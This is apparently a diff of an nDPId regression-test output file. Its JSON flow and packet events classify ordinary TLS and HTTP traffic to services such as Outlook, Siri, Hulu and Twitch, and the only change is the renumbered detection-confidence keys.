00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":449,"source":"sites.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1646483012464,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646483012464,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8NmFAAEAGec\/AqAGAKGGgApuUAbvrsR4tAAAAAKAC+vCXKwAAAgQFtAQCCAqLefivAAAAAAEDAwc="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":450,"source":"sites.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1646483012642,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646483012642,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0h61AAOYGgoooYaACwKgBgAG7m5Tksd5d67EeLoAS\/\/96NQAAAgQFtAEDAwgBAQQC"} 01149{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":451,"source":"sites.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1646483012643,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646483012643,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItNmNAAEAGd9zAqAGAKGGgApuUAbvrsR4u5LHeXlAYAfZhOgAAFgMBAgABAAH8AwO1u+oefRTEOwSLQjLjHhVV0xmNEBLIePou\/aAHVOd2CCAPyrTST2MnYmbxM2VIZnvQo7xJWWszq6XT0HB3y7IoMAAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAQAA4AAAtvdXRsb29rLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACBWvkXIQj27ydSlWNcrtPVAAtDjckdSwzserfJQbjqaWAAXAEEEmLcB97hFECojXeQm9a5elnWgKYRExdFmjiW10ZfBGP+icRnFpjaWBz97zhMeOCLZ79LJYWeVZvs9jOUTVoTTCAArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCLAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00890{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":451,"source":"sites.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646483012464,"flow_last_seen":1646483012643,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646483012643,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.97.160.2","src_port":39828,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"},"tls": {"version":"TLSv1.2","client_requested_server_name":"outlook.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01697{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":455,"source":"sites.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1646483012464,"flow_last_seen":1646483012821,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4952,"flow_avg_l4_payload_len":707,"midstream":0,"thread_ts_msec":1646483012821,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.97.160.2","src_port":39828,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"outlook.com","server_names":"*.internal.outlook.com,*.outlook.com,outlook.com,office365.com,*.office365.com,*.outlook.office365.com,*.office.com,outlook.office.com,substrate.office.com,attachment.outlook.live.net,attachment.outlook.office.net,attachment.outlook.officeppe.net,attachments.office.net,*.clo.footprintdns.com,*.nrb.footprintdns.com,ccs.login.microsoftonline.com,ccs-sdf.login.microsoftonline.com,substrate-sdf.office.com,attachments-sdf.office.net,*.live.com,mail.services.live.com,hotmail.com,*.hotmail.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"71d9ce75f347e6cf54268d7114ae6925","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert Cloud Services CA-1","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=outlook.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"4E:39:B4:13:4B:8C:77:57:7D:80:3D:76:40:E8:88:22:05:00:1C:58"}} +00890{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":451,"source":"sites.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646483012464,"flow_last_seen":1646483012643,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646483012643,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.97.160.2","src_port":39828,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"},"tls": {"version":"TLSv1.2","client_requested_server_name":"outlook.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01697{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":455,"source":"sites.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1646483012464,"flow_last_seen":1646483012821,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4952,"flow_avg_l4_payload_len":707,"midstream":0,"thread_ts_msec":1646483012821,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.97.160.2","src_port":39828,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"outlook.com","server_names":"*.internal.outlook.com,*.outlook.com,outlook.com,office365.com,*.office365.com,*.outlook.office365.com,*.office.com,outlook.office.com,substrate.office.com,attachment.outlook.live.net,attachment.outlook.office.net,attachment.outlook.officeppe.net,attachments.office.net,*.clo.footprintdns.com,*.nrb.footprintdns.com,ccs.login.microsoftonline.com,ccs-sdf.login.microsoftonline.com,substrate-sdf.office.com,attachments-sdf.office.net,*.live.com,mail.services.live.com,hotmail.com,*.hotmail.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"71d9ce75f347e6cf54268d7114ae6925","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert Cloud Services CA-1","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=outlook.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"4E:39:B4:13:4B:8C:77:57:7D:80:3D:76:40:E8:88:22:05:00:1C:58"}} 00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":458,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":458,"packets-processed":457,"total-skipped-flows":0,"total-l4-payload-len":197833,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":32,"total-detection-updates":38,"total-updates":0,"current-active-flows":27,"total-active-flows":36,"total-idle-flows":9,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":230,"global_ts_msec":1646495488872} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":458,"source":"sites.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495488872,"flow_last_seen":1646495488872,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488872,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"15.160.39.187","src_port":45898,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"sites.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1646495488872,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495488872,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8\/MhAAEAGRHDAqAGAD6Anu7NKAbvmP22QAAAAAKAC+vBpUQAAAgQFtAQCCAoE\/txmAAAAAAEDAwc="} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":459,"source":"sites.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1646495488880,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495488880,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADIGTzkPoCe7wKgBgAG7s0optQbo5j9tkaAS9LPzBQAAAgQFtAQCCAoEQEeaBP7cZgEDAwc="} 01169{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":460,"source":"sites.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1646495488882,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646495488882,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5\/MpAAEAGQnHAqAGAD6Anu7NKAbvmP22RKbUG6YAYAfaZtgAAAQEICgT+3HEEQEeaFgMBAgABAAH8AwO25geT89HZVQIHdAvPqVcdroWBp1YfQbaMJ\/IT9jA01iAQ9v2Qg1QtgoSL\/wrZgtn2pCmqUafGB71JcGJ1a5vPpQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAWABQAABFndXp6b25pLmFwcGxlLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACAfoSMbRE149N9PW6YpT\/B1gLVQ\/izORnimYk5vzkOPIwAXAEEEYgA3US97mm0LBVaj+yl1ih4nt3Ma4wqV+qwTQtcgUnIu95ynuvYl8aODuWCNRrQ8KDDItT25yW1YelOufG9kvAArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":460,"source":"sites.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495488872,"flow_last_seen":1646495488882,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495488882,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"15.160.39.187","src_port":45898,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleSiri","breed":"Acceptable","category":"VirtAssistant"},"tls": {"version":"TLSv1.2","client_requested_server_name":"guzzoni.apple.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":461,"source":"sites.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646495488872,"flow_last_seen":1646495488890,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"15.160.39.187","src_port":45898,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleSiri","breed":"Acceptable","category":"VirtAssistant"},"tls": {"version":"TLSv1.3","client_requested_server_name":"guzzoni.apple.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482791144,"flow_last_seen":1646482791191,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.101.195.214","src_port":51432,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Hulu","breed":"Fun","category":"Streaming"}} +00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":460,"source":"sites.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495488872,"flow_last_seen":1646495488882,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495488882,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"15.160.39.187","src_port":45898,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleSiri","breed":"Acceptable","category":"VirtAssistant"},"tls": {"version":"TLSv1.2","client_requested_server_name":"guzzoni.apple.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":461,"source":"sites.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646495488872,"flow_last_seen":1646495488890,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"15.160.39.187","src_port":45898,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleSiri","breed":"Acceptable","category":"VirtAssistant"},"tls": {"version":"TLSv1.3","client_requested_server_name":"guzzoni.apple.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482791144,"flow_last_seen":1646482791191,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.101.195.214","src_port":51432,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Hulu","breed":"Fun","category":"Streaming"}} 00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1646482801387,"flow_last_seen":1646482801394,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"34.96.123.111","src_port":44954,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.GoogleCloud","breed":"Acceptable","category":"Cloud"},"http": {}} 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1646482801387,"flow_last_seen":1646482801394,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"34.96.123.111","src_port":44954,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1646482825245,"flow_last_seen":1646482890325,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"69.191.252.15","src_port":39036,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Bloomberg","breed":"Acceptable","category":"Network"},"http": {}} 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1646482825245,"flow_last_seen":1646482890325,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"69.191.252.15","src_port":39036,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482623895,"flow_last_seen":1646482623982,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1380,"flow_tot_l4_payload_len":1897,"flow_avg_l4_payload_len":474,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"31.222.67.112","src_port":35054,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Badoo","breed":"Fun","category":"SocialNetwork"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1646482844787,"flow_last_seen":1646482844825,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":5346,"flow_avg_l4_payload_len":594,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.193.73","src_port":43412,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1646482646628,"flow_last_seen":1646482646693,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5845,"flow_avg_l4_payload_len":649,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.128","src_port":42580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Activision","breed":"Fun","category":"Game"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482659915,"flow_last_seen":1646482659961,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":1857,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.167","src_port":46084,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitch","breed":"Fun","category":"Video"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482879964,"flow_last_seen":1646482879998,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.51.246.65","src_port":46264,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482623895,"flow_last_seen":1646482623982,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1380,"flow_tot_l4_payload_len":1897,"flow_avg_l4_payload_len":474,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"31.222.67.112","src_port":35054,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Badoo","breed":"Fun","category":"SocialNetwork"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1646482844787,"flow_last_seen":1646482844825,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":5346,"flow_avg_l4_payload_len":594,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.193.73","src_port":43412,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1646482646628,"flow_last_seen":1646482646693,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5845,"flow_avg_l4_payload_len":649,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.128","src_port":42580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Activision","breed":"Fun","category":"Game"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482659915,"flow_last_seen":1646482659961,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":1857,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.167","src_port":46084,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Twitch","breed":"Fun","category":"Video"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482879964,"flow_last_seen":1646482879998,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.51.246.65","src_port":46264,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"}} 00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1646482686914,"flow_last_seen":1646482687080,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":45936,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1646482686914,"flow_last_seen":1646482687080,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":45936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 